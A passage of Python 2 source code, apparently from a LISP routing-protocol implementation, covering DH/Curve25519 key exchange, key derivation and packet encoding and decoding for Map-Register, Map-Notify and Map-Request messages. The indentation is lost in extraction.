dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != long): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != long): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context, data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
self.encrypt_key = lisp_hex_string(ek).zfill(32)
fill = 32 if self.do_poly else 40
self.icv_key = lisp_hex_string(ik).zfill(fill)
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
hash_output = hexlify(hash_output)
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (by_rlocs.has_key(addr_str) == False):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = ""
for i in range(0, len(key), 2):
new_key += chr(int(key[i:i+2], 16))
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread():
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = Queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header():
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register():
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = ""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
site_id = byte_swap_64(self.site_id)
packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
return(packet)
#enddef
def decode_xtr_id(self, packet):
format_size = struct.calcsize("QQQ")
if (len(packet) < format_size): return([None, None])
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
self.site_id = byte_swap_64(site_id)
return(True)
#enddef
#endclass
# The Map-Notify/Map-Notify-Ack message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=4/5| Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_notify():
def __init__(self, lisp_sockets):
self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.etr_port = 0
self.retransmit_timer = None
self.lisp_sockets = lisp_sockets
self.retry_count = 0
self.record_count = 0
self.alg_id = LISP_NONE_ALG_ID
self.key_id = 0
self.auth_len = 0
self.auth_data = ""
self.nonce = 0
self.nonce_key = ""
self.packet = None
self.site = ""
self.map_notify_ack = False
self.eid_records = ""
self.eid_list = []
#enddef
def print_notify(self):
auth_data = binascii.hexlify(self.auth_data)
if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
auth_data = self.auth_data
elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth_data) != 64):
auth_data = self.auth_data
#endif
line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
"{}{}{}, auth-len: {}, auth-data: {}")
lprint(line.format(bold("Map-Notify-Ack", False) if \
self.map_notify_ack else bold("Map-Notify", False),
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, auth_data))
#enddef
def zero_auth(self, packet):
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
#endif
packet += auth_data
return(packet)
#enddef
def encode(self, eid_records, password):
if (self.map_notify_ack):
first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
else:
first_long = (LISP_MAP_NOTIFY << 28) | self.record_count
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
if (self.alg_id == LISP_NONE_ALG_ID):
self.packet = packet + eid_records
return(self.packet)
#endif
#
# Run authentication hash across packet.
#
packet = self.zero_auth(packet)
packet += eid_records
hashval = lisp_hash_me(packet, self.alg_id, password, False)
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
self.auth_data = hashval
packet = packet[0:offset] + hashval + packet[offset + auth_len::]
self.packet = packet
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce_key = lisp_hex_string(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
packet = packet[format_size::]
self.eid_records = packet[self.auth_len::]
if (self.auth_len == 0): return(self.eid_records)
#
# Parse authentication and zero out the auth field in the packet.
#
if (len(packet) < self.auth_len): return(None)
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = ""
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
format_size = struct.calcsize("I") + struct.calcsize("QHH")
packet = self.zero_auth(orig_packet[:format_size])
format_size += auth_len
packet += orig_packet[format_size::]
return(packet)
#enddef
#endclass
#
# Map-Request message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=1 |A|M|P|S|p|s|m|I|Reserved |L|D| IRC | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source-EID-AFI | Source EID Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI 1 | ITR-RLOC Address 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ITR-RLOC-AFI n | ITR-RLOC Address n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / |N| Reserved | EID mask-len | EID-prefix-AFI |
# Rec +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Map-Reply Record ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | xTR-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When a Map-Request is signed, the hash is over the IPv6 CGA based EID,
# the Map-Request Nonce, and the EID-record. The signature is placed in
# the Source-EID as a LCAF JSON Type string of { "source-eid" : "<cga>",
# "signature-eid" : "<cga-of-signer>", "signature" : "<sig"> }.
#
# Generating private/public key-pairs via:
#
# openssl genpkey -algorithm RSA -out privkey.pem \
# -pkeyopt rsa_keygen_bits:2048
# openssl rsa -pubout -in privkey.pem -out pubkey.pem
#
# And use ecdsa.VerifyingKey.from_pem() after reading in file.
#
# xTR-ID is appended to the end of a Map-Request when a subscription request
# is piggybacked (when self.subscribe_bit is True).
#
class lisp_map_request():
def __init__(self):
self.auth_bit = False
self.map_data_present = False
self.rloc_probe = False
self.smr_bit = False
self.pitr_bit = False
self.smr_invoked_bit = False
self.mobile_node = False
self.xtr_id_present = False
self.local_xtr = False
self.dont_reply_bit = False
self.itr_rloc_count = 0
self.record_count = 0
self.nonce = 0
self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.itr_rlocs = []
self.keys = None
self.privkey_filename = None
self.map_request_signature = None
self.subscribe_bit = False
self.xtr_id = None
self.json_telemetry = None
#enddef
def print_prefix(self):
if (self.target_group.is_null()):
return(green(self.target_eid.print_prefix(), False))
#endif
return(green(self.target_eid.print_sg(self.target_group), False))
#enddef
def print_map_request(self):
xtr_id = ""
if (self.xtr_id != None and self.subscribe_bit):
xtr_id = "subscribe, xtr-id: 0x{}, ".format(lisp_hex_string( \
self.xtr_id))
#endif
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")
lprint(line.format(bold("Map-Request", False), \
"A" if self.auth_bit else "a",
"D" if self.map_data_present else "d",
"R" if self.rloc_probe else "r",
"S" if self.smr_bit else "s",
"P" if self.pitr_bit else "p",
"I" if self.smr_invoked_bit else "i",
"M" if self.mobile_node else "m",
"X" if self.xtr_id_present else "x",
"L" if self.local_xtr else "l",
"D" if self.dont_reply_bit else "d", self.itr_rloc_count,
self.record_count, lisp_hex_string(self.nonce),
self.source_eid.afi, green(self.source_eid.print_address(), False),
" (with sig)" if self.map_request_signature != None else "",
self.target_eid.afi, green(self.print_prefix(), False), xtr_id))
keys = self.keys
for itr in self.itr_rlocs:
if (itr.afi == LISP_AFI_LCAF and self.json_telemetry != None):
continue
#endif
